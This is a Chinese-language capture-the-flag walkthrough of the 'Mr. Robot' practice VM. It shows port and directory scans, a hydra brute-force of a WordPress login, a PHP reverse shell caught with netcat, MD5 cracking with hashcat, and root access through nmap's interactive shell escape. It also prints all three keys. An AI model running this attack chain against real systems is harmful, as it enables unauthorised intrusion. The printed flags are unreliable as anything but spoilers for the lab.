Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?
你能扎根这台机器人先生风格的机器吗?这是一个面向初学者/中级用户的虚拟机。机器上有3个隐藏的钥匙,你能找到它们吗?

Credit to Leon Johnson for creating this machine. This machine is used here with the explicit permission of the creator <3
感谢Leon Johnson创造了这台机器。此机器在创建者的明确许可下在此处使用 <3

1.扫描端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[/home/ace]
└─# nmap -T4 -sC -sV 10.10.135.133
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-03 09:21 CST
Nmap scan report for 10.10.135.133
Host is up (0.28s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open   ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.83 seconds

2.查看网页

image-20230803092512829

emmmm….有点魔幻

扫描目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
┌──(root㉿kali)-[/home/ace]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.135.133/
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.135.133/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/08/03 09:31:08 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 236] [--> http://10.10.135.133/images/]
/blog                 (Status: 301) [Size: 234] [--> http://10.10.135.133/blog/]
/sitemap              (Status: 200) [Size: 0]
/rss                  (Status: 301) [Size: 0] [--> http://10.10.135.133/feed/]
/login                (Status: 302) [Size: 0] [--> http://10.10.135.133/wp-login.php]                                                                                 
/0                    (Status: 301) [Size: 0] [--> http://10.10.135.133/0/]
/feed                 (Status: 301) [Size: 0] [--> http://10.10.135.133/feed/]
/video                (Status: 301) [Size: 235] [--> http://10.10.135.133/video/]
/image                (Status: 301) [Size: 0] [--> http://10.10.135.133/image/]
/atom                 (Status: 301) [Size: 0] [--> http://10.10.135.133/feed/atom/]
/wp-content           (Status: 301) [Size: 240] [--> http://10.10.135.133/wp-content/]                                                                                
/admin                (Status: 301) [Size: 235] [--> http://10.10.135.133/admin/]
/audio                (Status: 301) [Size: 235] [--> http://10.10.135.133/audio/]
/intro                (Status: 200) [Size: 516314]
/wp-login             (Status: 200) [Size: 2613]
/css                  (Status: 301) [Size: 233] [--> http://10.10.135.133/css/]
/rss2                 (Status: 301) [Size: 0] [--> http://10.10.135.133/feed/]
/license              (Status: 200) [Size: 309]
/wp-includes          (Status: 301) [Size: 241] [--> http://10.10.135.133/wp-includes/]                                                                               
/js                   (Status: 301) [Size: 232] [--> http://10.10.135.133/js/]
/Image                (Status: 301) [Size: 0] [--> http://10.10.135.133/Image/]
/rdf                  (Status: 301) [Size: 0] [--> http://10.10.135.133/feed/rdf/]
/page1                (Status: 301) [Size: 0] [--> http://10.10.135.133/]
/readme               (Status: 200) [Size: 64]
/robots               (Status: 200) [Size: 41]
/dashboard            (Status: 302) [Size: 0] [--> http://10.10.135.133/wp-admin/]
/%20                  (Status: 301) [Size: 0] [--> http://10.10.135.133/]
Progress: 6943 / 220561 (3.15%)^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2023/08/03 09:35:18 Finished
===============================================================

查看网页

image-20230803093908230

image-20230803093846913

那么什么是有效的用户名?CTF本身的灵感来自电视节目“机器人先生”,主角的名字是艾略特(即使我从观看节目中已经不知道,在互联网上很容易搜索),所以让我们尝试一下。

image-20230803094708765

用hydra爆破image-20230803135724769

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
                                                                                                                                                                        
┌──(root㉿kali)-[/home/ace/下载]
└─# hydra -l Elliot -P fsocity.dic.uniq \
-s 80 10.10.184.29 http-post-form -t 30 \
'/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:The password you entered for the username'
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-03 13:25:33
[ERROR] File for passwords not found: fsocity.dic.uniq
                                                                                                                                                                        
┌──(root㉿kali)-[/home/ace/下载]
└─# hydra -l Elliot -P fsocity.dic \     
-s 80 10.10.184.29 http-post-form -t 30 \
'/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:The password you entered for the username'
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-03 13:25:43
[DATA] max 30 tasks per 1 server, overall 30 tasks, 858235 login tries (l:1/p:858235), ~28608 tries per task
[DATA] attacking http-post-form://10.10.184.29:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:The password you entered for the username
[STATUS] 1122.00 tries/min, 1122 tries in 00:01h, 857113 to do in 12:44h, 30 active
[STATUS] 1115.00 tries/min, 3345 tries in 00:03h, 854890 to do in 12:47h, 30 active
[STATUS] 1009.57 tries/min, 7067 tries in 00:07h, 851168 to do in 14:04h, 30 active
^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

时间太久了,用已经有的密码吧

密码:ER28-0652

3.通过网页得到shell

image-20230803135726657

上传kali的webshell,wp的404漏洞

访问网页:

本地监听:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(root㉿kali)-[/usr/share/webshells/php]
└─# nc -lvnp 4444                 
listening on [any] 4444 ...
connect to [10.18.75.12] from (UNKNOWN) [10.10.184.29] 48435
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 06:30:47 up  1:12,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')"
daemon@linux:/$ ls
ls
bin   dev  home        lib    lost+found  mnt  proc  run   srv  tmp  var
boot  etc  initrd.img  lib64  media       opt  root  sbin  sys  usr  vmlinuz
daemon@linux:/$ cd home
cd home
daemon@linux:/home$ ls
ls
robot
daemon@linux:/home$ cd robot
cd robot
daemon@linux:/home/robot$ ls
ls
key-2-of-3.txt  password.raw-md5
daemon@linux:/home/robot$ cat key-2-of-3.txt
cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
daemon@linux:/home/robot$ cat password.raw-ma5
cat password.raw-ma5
cat: password.raw-ma5: No such file or directory
daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

md5解密得到密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
┌─[root@parrort-vmwarevirtualplatform]─[/home/parrort/Desktop]
└──╼ #hashcat c3fcd3d76192e4007dfb496cca67e13b  -m 0 rockyou.txt --force
hashcat (v6.1.1) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-13th Gen Intel(R) Core(TM) i5-13500H, 2855/2919 MB (1024 MB allocatable), 1MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

c3fcd3d76192e4007dfb496cca67e13b:abcdefghijklmnopqrstuvwxyz
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD5
Hash.Target......: c3fcd3d76192e4007dfb496cca67e13b
Time.Started.....: Thu Aug  3 14:55:25 2023, (0 secs)
Time.Estimated...: Thu Aug  3 14:55:25 2023, (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   464.4 kH/s (0.19ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 40960/14344385 (0.29%)
Rejected.........: 0/40960 (0.00%)
Restore.Point....: 39936/14344385 (0.28%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: promo2007 -> loserface1

Started: Thu Aug  3 14:54:49 2023
Stopped: Thu Aug  3 14:55:27 2023

得到key2

1
2
3
4
5
6
7
8
9
robot@linux:/$ cd home/robot
cd home/robot
robot@linux:~$ ls  
ls
key-2-of-3.txt  password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$

4.sudo提权

官网提示nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
robot@linux:/$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# cd /root
cd /root
# ls
ls
firstboot_done  key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
#